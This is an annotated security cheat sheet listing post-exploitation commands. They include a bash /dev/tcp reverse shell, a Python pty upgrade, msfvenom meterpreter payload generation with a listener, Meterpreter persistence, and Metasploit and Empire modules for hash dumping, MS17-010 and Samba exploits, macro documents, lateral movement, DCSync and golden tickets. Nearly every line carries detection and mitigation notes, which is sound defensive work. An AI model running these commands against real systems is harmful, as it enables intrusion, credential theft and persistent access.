SecNotes
# Shell handling after initial access. Both entries are plain shell one-liners.
# NOTE(review): the trailing "| |" on these lines looks like table residue from
# the page export rather than part of the commands - confirm against the raw file.
#
# Starts /bin/sh attached to a pseudo-terminal through Python's pty module, which
# gives a non-interactive shell a TTY.
# Detection: a python process with "pty.spawn" on its command line whose child is
# a shell, particularly when the parent is a web or database service account.
python -c 'import pty; pty.spawn("/bin/sh")' | |
# Runs an interactive bash with stdout and stderr redirected to a TCP connection
# opened through bash's /dev/tcp path, and stdin duplicated from it (0>&1): a
# reverse shell. 10.0.0.1:8080 is the note author's sample listener address.
# Detection: "/dev/tcp/" in recorded command lines (auditd execve, EDR telemetry)
# and a bash process whose fds 0-2 are a socket.
# Mitigation: default-deny egress from servers that have no reason to dial out.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
# Metasploit payload generation and listener, run from the operator's own shell.
#
# Builds a Windows executable (-f exe) carrying the windows/meterpreter/reverse_tcp
# payload, which connects back to LHOST:LPORT. -e selects the x86/shikata_ga_nai
# encoder and -b lists bytes to keep out of the encoded output.
# Defender view: the encoder changes the file's bytes, not what it does once run,
# so behavioural detection (a new unsigned executable making an outbound
# connection right after launch, injection into other processes) still applies.
# NOTE(review): the trailing cmd.exe is presumably meant as the output name; a
# file named like a system binary outside the system directory is a hunting signal.
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe | |
# Starts msfconsole and runs the quoted console commands: select multi/handler,
# set the payload type and the listening address/port, then start the listener.
# This runs on the operator side; on a monitored network it is visible only as
# the destination of the callback (172.16.154.1:1111 in this note).
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run" | |
# Metasploit console / Meterpreter session commands (not shell commands).
#
# Meterpreter persistence script: -r and -p give the callback host and port, -i the
# interval in seconds between connection attempts, -A starts a matching handler
# on the operator side.
# Detection: one host dialling the same address at a fixed short interval; newly
# written script files in temp directories and new autorun entries are the
# artefacts usually associated with this script - verify for the version in use.
run persistence -A -i 10 -p 6767 -r 192.168.0.24 | |
# Post module that dumps local account password hashes from a Windows session.
# Mitigation: unique, rotated local administrator passwords (e.g. LAPS) so a
# dumped hash is not valid on other hosts; alert on non-system reads of the SAM
# and SYSTEM registry hives.
use post/windows/gather/hashdump | |
# Post module that collects the session's environment variables. Secrets kept in
# environment variables (API keys, connection strings) are exposed by this.
use post/multi/gather/env | |
# Post module that, going by its name, erases stored HSTS data on the target, so
# HTTPS enforcement for previously visited sites lapses until it is re-learned.
use post/multi/manage/hsts_eraser | |
# Post module that checks the session host against local privilege-escalation
# exploits. What it reports is the host's missing patches; patch level is the
# control that empties its output.
use post/multi/recon/local_exploit_suggester | |
# Same module as two lines above; listed twice in these notes.
use post/multi/manage/hsts_eraser | |
# Exploit for the Samba "username map script" command-injection flaw in old
# Samba releases. Mitigation: upgrade Samba and do not expose SMB to untrusted
# networks.
use exploit/multi/samba/usermap_script | |
# Exploit built on the MS17-010 SMB flaws (per the module name), ending in
# psexec-style service execution. Mitigation: apply the MS17-010 update, disable
# SMBv1, restrict TCP 445 between workstations.
# Detection: unexpected service installs (System 7045 / Security 4697).
use exploit/windows/smb/ms17_010_psexec | |
# Hosts a payload on an operator-run web server to be fetched and run by a script
# interpreter on the target.
# Detection: powershell, python or similar interpreters downloading and executing
# remote content in a single command line.
use exploit/multi/script/web_delivery | |
# The two fileformat modules build Word documents that run code when opened, one
# through an HTA and one through a macro (per the module names).
# Mitigation: block macros in files from the internet, stop Office applications
# from creating child processes (attack surface reduction rules), and treat
# mshta.exe launched by an Office process as an alert.
use exploit/windows/fileformat/office_word_hta | |
use exploit/multi/fileformat/office_word_macro | |
# Empire post-exploitation modules ("usemodule" is Empire's module selector).
# NOTE(review): the trailing * on two entries appears to be Empire's marker for
# modules that need an elevated agent - confirm against the Empire version used.
#
# Domain-controller discovery, PowerShell (PowerView) and Python variants.
# Detection: LDAP/DNS queries for domain controllers from hosts and accounts that
# do not normally perform directory enumeration.
usemodule powershell/situational_awareness/network/powerview/get_domain_controller | |
usemodule python/situational_awareness/network/active_directory/get_domaincontrollers | |
# Lateral movement through a remotely created service (psexec style).
# Detection: service-install events (System 7045 / Security 4697) with unusual
# binary paths, correlated with an inbound SMB session.
usemodule powershell/lateral_movement/invoke_psexec | |
# Injects shellcode into a process from PowerShell.
# Detection: PowerShell script-block logging and EDR memory-injection telemetry.
usemodule powershell/code_execution/invoke_shellcode | |
# Local password-hash dump. Same mitigations as any SAM dump: unique local admin
# passwords and alerting on reads of the SAM/SYSTEM hives.
usemodule powershell/credentials/powerdump* | |
# Pass-the-hash through Mimikatz.
# Detection: Security 4624 with logon type 9 (NewCredentials) on the source host.
# Mitigation: keep privileged accounts from logging on to lower-tier machines.
usemodule powershell/credentials/mimikatz/pth* | |
# DCSync: requests account secrets from a domain controller through directory
# replication.
# Detection: replication requests originating from a host that is not a domain
# controller (Security 4662 on the DC with the replication access-right GUIDs).
# Mitigation: audit who holds the "Replicating Directory Changes" rights.
usemodule powershell/credentials/mimikatz/dcsync | |
# Resolves a user name to its SID.
usemodule powershell/management/user_to_sid | |
# Forges a Kerberos TGT from the krbtgt account's key.
# Response after a suspected domain compromise: reset the krbtgt password twice;
# hunt for tickets with lifetimes outside the domain's Kerberos policy.
usemodule powershell/credentials/mimikatz/golden_ticket | |
# Lateral movement through WMI process creation.
# Detection: WmiPrvSE.exe spawning command interpreters on the destination host.
usemodule powershell/lateral_movement/invoke_wmi |